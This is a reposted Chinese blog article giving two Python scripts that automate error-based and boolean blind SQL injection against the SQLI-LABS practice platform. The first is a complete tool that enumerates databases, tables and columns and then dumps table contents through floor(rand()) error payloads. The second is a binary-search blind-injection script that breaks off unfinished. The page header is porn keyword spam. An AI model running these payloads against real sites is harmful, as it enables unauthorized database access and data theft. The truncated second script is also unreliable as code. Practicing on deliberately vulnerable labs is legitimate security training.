日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > python >内容正文

python

python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现

發(fā)布時間:2023/12/9 python 48 豆豆
生活随笔 收集整理的這篇文章主要介紹了 python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

通過前面payload的構(gòu)造,不難發(fā)現(xiàn),對于報錯型注入和布爾注入(sql盲注)純手工注入的效率是非常慢的。這些payload語句雖然復(fù)雜,但大部分內(nèi)容都是相同的,因此,一言不合就寫了個腳本自動化注入,坐等信息爆出的感覺–>我就靜靜看著不說話_

以下兩個python腳本僅適用于SQLI-LABS,在其他平臺使用還需要做少許改動~~~

*** SQLI-LABS 是一個專業(yè)的SQL注入練習(xí)平臺**

基于報錯型注入的自動化腳本(sqli-labs-master/Less-5/)

#!/usr/bin/env python

#coding=utf-8

import sys

import requests

import re

import binascii

#sys.argv[1]

# --dbs url

# --tables -D database url

# --columns -T tablename -D database url

# --dump -C columnname -T tablename -D database url

def http_get(url):

# proxies = {'http': 'http://127.0.0.1:8080'}

#return requests.get(dbs_num_url, proxies=proxies)

return requests.get(url)

def getAllDatabases(url):

dbs_num_url = url + "'+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ "

resp = http_get(dbs_num_url)

html = resp.content

#print html

# ~~:~~4~~:~~

dbs_num = int(re.search(r'~~:~~(d*?)~~:~~', html).group(1))

print (u"數(shù)據(jù)庫數(shù)量: %d" % dbs_num)

dbs = []

print (u"數(shù)據(jù)庫名: ")

for index in xrange(0,dbs_num):

db_name_url = url + "'+and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % index

html = http_get(db_name_url).content

db_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)

dbs.append(db_name)

print ("t%s" % db_name)

def getAllTablesByDb(url, db_name):

db_name_hex = "0x" + binascii.b2a_hex(db_name)

tables_num_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, count(table_name), 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % db_name_hex

html = http_get(tables_num_url).content

tables_num = int(re.search(r'~~:~~(d*?)~~:~~', html).group(1))

print (u"%s 庫中,表的數(shù)量: %d" % (db_name, tables_num))

print (u"表名: ")

for index in xrange(0,tables_num):

tables_name_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, table_name, 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % (db_name_hex, index)

html = http_get(tables_name_url).content

table_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)

print ("t%s" % table_name)

def getAllColumnsByTable(url, db_name,tab_name):

db_name_hex = "0x" + binascii.b2a_hex(db_name)

tab_name_hex = "0x" + binascii.b2a_hex(tab_name)

column_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(column_name) from information_schema.columns where table_schema=%s and table_name=%s),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex,tab_name_hex)

html = http_get(column_num_url).content

column_num = int(re.search(r'::(d*?)::', html).group(1))

print (u"%s 表中,字段的數(shù)量: %d" % (tab_name, column_num))

print (u"列名:")

for index in xrange(0,column_num):

tables_name_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex,tab_name_hex,index)

html = http_get(tables_name_url).content

column_name = re.search(r'::(.*?)::', html).group(1)

print ("t%s" % column_name)

pass

def getAllContent(url, db_name, tab_name, col_name,):

# db_name_hex = "0x" + binascii.b2a_hex(db_name)

# tab_name_hex = "0x" + binascii.b2a_hex(tab_name)

# col_name = binascii.b2a_hex(col_name)

# col = re.split(",",col_name) #分割參數(shù):字段名

# le = len(col)

content_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(*) from %s.%s),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name,tab_name)

html = http_get(content_num_url).content

col_name_re = col_name.replace(',',',0x09,')

content_num = int(re.search(r'::(d*?)::', html).group(1))

print "%s 表中,行數(shù)為: %d" % (tab_name, content_num)

for index in xrange(0,content_num):

content_name_url = url + "' and (select 1 from (select count(*),concat((select concat(0x3a,0x3a,%s,0x3a,0x3a) from %s.%s limit %d,1), floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (col_name_re,db_name,tab_name,index)

html = http_get(content_name_url).content

# print htmlsss

content_name = re.search(r'::(.*?)::', html).group(1)

print "t%s" % content_name

def main():

if sys.argv[1] == '--dbs':

getAllDatabases(sys.argv[2])

elif sys.argv[1] == '--tables':

getAllTablesByDb(sys.argv[4], sys.argv[3])

elif sys.argv[1] == '--columns':

# print sys.argv[6],sys.argv[5],sys.argv[3]

getAllColumnsByTable(sys.argv[6],sys.argv[5],sys.argv[3])

pass

elif sys.argv[1] == '--dump':

getAllContent(sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3])

# print sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3]

pass

else:

print (u"我不懂你的參數(shù)!")

if __name__ == '__main__':

main()

基于bool型注入(sql盲注)的自動化腳本(sqli-labs-master/Less-8/)

#!/usr/bin/env python

#coding=utf-8

import sys

import requests

import re

import binascii

#sys.argv[1]

# --dbs url

# --tables url -D database

# --columns url -D database -T tablename

# --dump url -D database -T tablename -C columnname

def http_get(url):

return requests.get(url)

pass

def dichotomy(sql): #二分法

left = 1

right = 500

while 1:

mid = (left + right)/2

# print mid

if mid == left:

return mid

break

db_count_url = sql + "%d)--+" % mid

# print db_count_url

html = http_get(db_count_url).content

# print html

search_flag = re.search("You are in", html)

if search_flag:

right = mid

# print "right:" + str(right)

else:

left = mid

# print "left:" + str(left)

def getAllDabatases(url):

search_db_num =url + "' and ((select count(schema_name) from information_schema.schemata)

文章來源于互聯(lián)網(wǎng),如有雷同請聯(lián)系站長刪除:三、基于報錯型注入和sql盲注的自動化實現(xiàn)

總結(jié)

以上是生活随笔為你收集整理的python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。